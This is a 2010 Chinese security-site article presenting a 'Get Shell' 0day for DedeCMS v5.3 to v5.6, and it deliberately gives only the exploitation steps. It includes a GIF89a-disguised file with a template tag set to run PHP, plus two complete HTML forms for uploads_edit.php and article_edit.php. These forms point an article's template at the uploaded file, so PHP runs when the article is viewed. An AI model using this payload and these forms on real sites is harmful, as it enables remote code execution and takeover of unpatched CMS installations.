首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>漏洞资料>文章内容 dedecms v5.3-v5.6 Get Shell 0day利用分析 来源：www.wolvez.org 作者：toby57 发布时间：2010-08-18   此0day已经出现了相当长一段时间，今天配合小龙同学提供的日志看了下代码，了解了漏洞成因。大多同学对成因不感兴趣，这儿就只公布利用方法。 Gif89a{dede:field name='toby57' runphp='yes'} phpinfo(); {/dede:field} 保存为1.gif <form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" "> <input type="hidden" name="aid" value="7" /> <input type="hidden" name="mediatype" value="1" /> <input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> <input type="hidden" name="dopost" value="save" /> <input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> <input name="addonfile" type="file" id="addonfile"/> <button class="button2" type="submit" >更改</button> </form> 构造如上表单，上传后图片保存为/uploads/userup/3/1.gif 发表文章，然后构造修改表单如下： <form  action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data"> <input type="hidden" name="dopost" value="save" /> <input type="hidden" name="aid" value="2" /> <input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" /> <input type="hidden" name="channelid" value="1" /> <input type="hidden" name="oldlitpic" value="" /> <input type="hidden" name="sortrank" value="1282049150" />   <input  name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> <input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/> <select name='typeid' size='1'> <option value='1' class='option3' selected=''>Test</option> <select name='mtypesid' size='1'> <option value='0' selected>请选择分类...</option> <option value='1' class='option3' selected>aa</option></select> <textarea name="description" id="description">aaaaaaaaaaaaa</textarea> <input type='hidden' name='dede_addonfields' value="templet"> <input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> <input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> <button class="button2" type="submit">提交</button> </form> 红色部分都 是需要注意的地方，得根据实际情况进行对应修改。 修改完成后查看文章即可。   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·XSOK环境变量本地命令执行漏洞 ·N点虚拟主机管理系统 致命漏洞。 ·南方数据企业网站管理系统V10.0 ·动网（DVBBS）Version 8.2.0 后 ·Solaris 10 telnet漏洞及解决 ·破解无线路由器密码，常见无线密 ·Nginx %00空字节执行php漏洞 ·WinWebMail、7I24提权漏洞 ·XPCD xpcd-svga本地缓冲区溢出漏 ·Struts2多个漏洞简要分析 ·ecshop2.72 api.php 文件鸡肋注 ·Discuz!后台拿Webshell 0day   相关文章 ·FreeBSD Kernel nfs_mount漏洞分 ·dedecms5.3--5.6通杀执行漏洞 ·Dedecms <= V5.6 Final模板执行 ·FreeBSD Kernel mountnfs() 漏洞 ·Microsoft IE 8 toStaticHTML() ·请下载新版工行个人网银 ·新版搜狗输入法已修复多个安全漏 ·ecshop SQL注射漏洞 ·discuz 7.x xss 反射型exploit ·Windows Win32k.sys 窗口创建漏 ·最新 phpcms 0day(图） ·dvbbs php2.0 多个漏洞   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved